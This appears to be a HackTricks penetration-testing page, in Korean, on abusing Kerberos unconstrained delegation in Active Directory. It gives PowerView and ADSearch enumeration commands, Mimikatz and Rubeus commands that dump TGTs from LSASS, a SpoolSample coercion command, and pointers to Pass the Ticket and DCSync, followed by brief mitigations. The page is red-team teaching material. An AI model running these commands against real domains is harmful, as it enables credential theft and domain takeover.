Unconstrained Delegation

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

Unconstrained delegation

์ด๊ฒƒ์€ ๋„๋ฉ”์ธ ๊ด€๋ฆฌ์ž๊ฐ€ ๋„๋ฉ”์ธ ๋‚ด์˜ ๋ชจ๋“  ์ปดํ“จํ„ฐ์— ์„ค์ •ํ•  ์ˆ˜ ์žˆ๋Š” ๊ธฐ๋Šฅ์ž…๋‹ˆ๋‹ค. ๊ทธ๋Ÿฐ ๋‹ค์Œ, ์‚ฌ์šฉ์ž๊ฐ€ ์ปดํ“จํ„ฐ์— ๋กœ๊ทธ์ธํ•  ๋•Œ๋งˆ๋‹ค ํ•ด๋‹น ์‚ฌ์šฉ์ž์˜ TGT ๋ณต์‚ฌ๋ณธ์ด DC์—์„œ ์ œ๊ณตํ•˜๋Š” TGS ๋‚ด๋กœ ์ „์†ก๋˜๊ณ  LSASS์˜ ๋ฉ”๋ชจ๋ฆฌ์— ์ €์žฅ๋ฉ๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ ํ•ด๋‹น ๋จธ์‹ ์—์„œ ๊ด€๋ฆฌ์ž ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ, ํ‹ฐ์ผ“์„ ๋คํ”„ํ•˜๊ณ  ์‚ฌ์šฉ์ž๋ฅผ ๊ฐ€์žฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋”ฐ๋ผ์„œ ๋„๋ฉ”์ธ ๊ด€๋ฆฌ์ž๊ฐ€ โ€œUnconstrained Delegationโ€ ๊ธฐ๋Šฅ์ด ํ™œ์„ฑํ™”๋œ ์ปดํ“จํ„ฐ์— ๋กœ๊ทธ์ธํ•˜๊ณ , ํ•ด๋‹น ๋จธ์‹ ์—์„œ ๋กœ์ปฌ ๊ด€๋ฆฌ์ž ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ, ํ‹ฐ์ผ“์„ ๋คํ”„ํ•˜๊ณ  ๋„๋ฉ”์ธ ๊ด€๋ฆฌ์ž๋ฅผ ์–ด๋””์„œ๋“  ๊ฐ€์žฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค (๋„๋ฉ”์ธ ๊ถŒํ•œ ์ƒ์Šน).

์ด ์†์„ฑ์„ ๊ฐ€์ง„ ์ปดํ“จํ„ฐ ๊ฐ์ฒด๋ฅผ ์ฐพ์œผ๋ ค๋ฉด userAccountControl ์†์„ฑ์ด ADS_UF_TRUSTED_FOR_DELEGATION๋ฅผ ํฌํ•จํ•˜๋Š”์ง€ ํ™•์ธํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค. ์ด๋Š” LDAP ํ•„ํ„ฐ โ€˜(userAccountControl:1.2.840.113556.1.4.803:=524288)โ€™๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” powerview๊ฐ€ ์ˆ˜ํ–‰ํ•˜๋Š” ์ž‘์—…์ž…๋‹ˆ๋‹ค:

# List unconstrained computers
## Powerview
## A DCs always appear and might be useful to attack a DC from another compromised DC from a different domain (coercing the other DC to authenticate to it)
Get-DomainComputer โ€“Unconstrained โ€“Properties name
Get-DomainUser -LdapFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'

## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem

# Export tickets with Mimikatz
## Access LSASS memory
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way

# Monitor logins and export new tickets
## Doens't access LSASS memory directly, but uses Windows APIs
Rubeus.exe dump
Rubeus.exe monitor /interval:10 [/filteruser:<username>] #Check every 10s for new TGTs

๊ด€๋ฆฌ์ž(๋˜๋Š” ํ”ผํ•ด์ž ์‚ฌ์šฉ์ž)์˜ ํ‹ฐ์ผ“์„ ๋ฉ”๋ชจ๋ฆฌ์— Mimikatz ๋˜๋Š” Rubeus๋กœ ๋กœ๋“œํ•˜์—ฌ Pass the Ticket.
์ž์„ธํ•œ ์ •๋ณด: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
ired.team์˜ Unconstrained delegation์— ๋Œ€ํ•œ ์ถ”๊ฐ€ ์ •๋ณด.

๊ฐ•์ œ ์ธ์ฆ

๊ณต๊ฒฉ์ž๊ฐ€ โ€œUnconstrained Delegationโ€œ์ด ํ—ˆ์šฉ๋œ ์ปดํ“จํ„ฐ๋ฅผ ํƒ€๋ฝ์‹œํ‚ฌ ์ˆ˜ ์žˆ๋‹ค๋ฉด, ๊ทธ๋Š” Print server๋ฅผ ์†์—ฌ์„œ ์ž๋™์œผ๋กœ ๋กœ๊ทธ์ธํ•˜๊ฒŒ ํ•˜์—ฌ ์„œ๋ฒ„์˜ ๋ฉ”๋ชจ๋ฆฌ์— TGT๋ฅผ ์ €์žฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
๊ทธ๋Ÿฐ ๋‹ค์Œ, ๊ณต๊ฒฉ์ž๋Š” ์‚ฌ์šฉ์ž Print server ์ปดํ“จํ„ฐ ๊ณ„์ •์„ ๊ฐ€์žฅํ•˜๊ธฐ ์œ„ํ•ด Pass the Ticket ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

ํ”„๋ฆฐํŠธ ์„œ๋ฒ„๊ฐ€ ์–ด๋–ค ๋จธ์‹ ์— ๋Œ€ํ•ด ๋กœ๊ทธ์ธํ•˜๋„๋ก ํ•˜๋ ค๋ฉด SpoolSample ์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

TGT๊ฐ€ ๋„๋ฉ”์ธ ์ปจํŠธ๋กค๋Ÿฌ์—์„œ ์˜จ ๊ฒฝ์šฐ, DCSync attack๋ฅผ ์ˆ˜ํ–‰ํ•˜์—ฌ DC์˜ ๋ชจ๋“  ํ•ด์‹œ๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
์ด ๊ณต๊ฒฉ์— ๋Œ€ํ•œ ๋” ๋งŽ์€ ์ •๋ณด๋Š” ired.team์—์„œ ํ™•์ธํ•˜์„ธ์š”.

์—ฌ๊ธฐ์—์„œ ์ธ์ฆ์„ ๊ฐ•์ œํ•˜๋Š” ๋‹ค๋ฅธ ๋ฐฉ๋ฒ•์„ ์ฐพ์œผ์„ธ์š”:

Force NTLM Privileged Authentication

์™„ํ™”

  • DA/Admin ๋กœ๊ทธ์ธ์„ ํŠน์ • ์„œ๋น„์Šค๋กœ ์ œํ•œ
  • ํŠน๊ถŒ ๊ณ„์ •์— ๋Œ€ํ•ด โ€œ๊ณ„์ •์ด ๋ฏผ๊ฐํ•˜๋ฉฐ ์œ„์ž„ํ•  ์ˆ˜ ์—†์Œโ€ ์„ค์ •

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ